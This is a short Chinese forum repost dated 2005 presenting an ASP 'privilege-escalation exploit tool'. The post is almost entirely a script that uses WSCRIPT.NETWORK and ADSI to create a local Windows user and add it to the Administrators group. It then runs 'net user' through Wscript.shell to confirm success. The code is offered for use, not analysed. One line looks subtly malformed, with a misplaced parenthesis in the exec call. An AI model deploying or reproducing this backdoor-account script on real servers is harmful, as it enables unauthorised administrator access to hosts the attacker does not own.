.成功的话是在user权限下成功添加Administrators组的用户!
成功具体看运气了。。呵呵!
程序代码:
.network对象脚本权限提升漏洞利用工具
<%@codepage=936
on error resume next
if request.servervariables("REMOTE_ADDR")<>"127.0.0.1" then
response.write "iP !s n0T RiGHt"
else
if request("username")<>"" then
username=request("username")
passwd=request("passwd")
Response.Expires=0
Session.TimeOut=50
Server.ScriptTimeout=3000
set lp=Server.CreateObject("WSCRIPT.NETWORK")
oz="WinNT://"&lp.ComputerName
Set ob=GetObject(oz)
Set oe=GetObject(oz&"/Administrators,group")
Set od=ob.Create("user",username)
od.SetPassword passwd
od.SetInfo
oe.Add oz&"/"&username
if err then
response.write "哎~~运气~~~……"
else
if instr(server.createobject("Wscript.shell").exec("cmd.exe /c net user "&username.stdout.readall),"上次登录")>0 then
response.write "没建立成功.郁闷!"
else
Response.write "OMG!"&username&"添加成功咯"
end if
end if
else
response.write "请输入输入用户名"
end if
end if
%>
成功的话!:>作者: 清情朔月 时间: 2005-4-22 10:06 标题: 添加超级用户的.asp代码(转贴)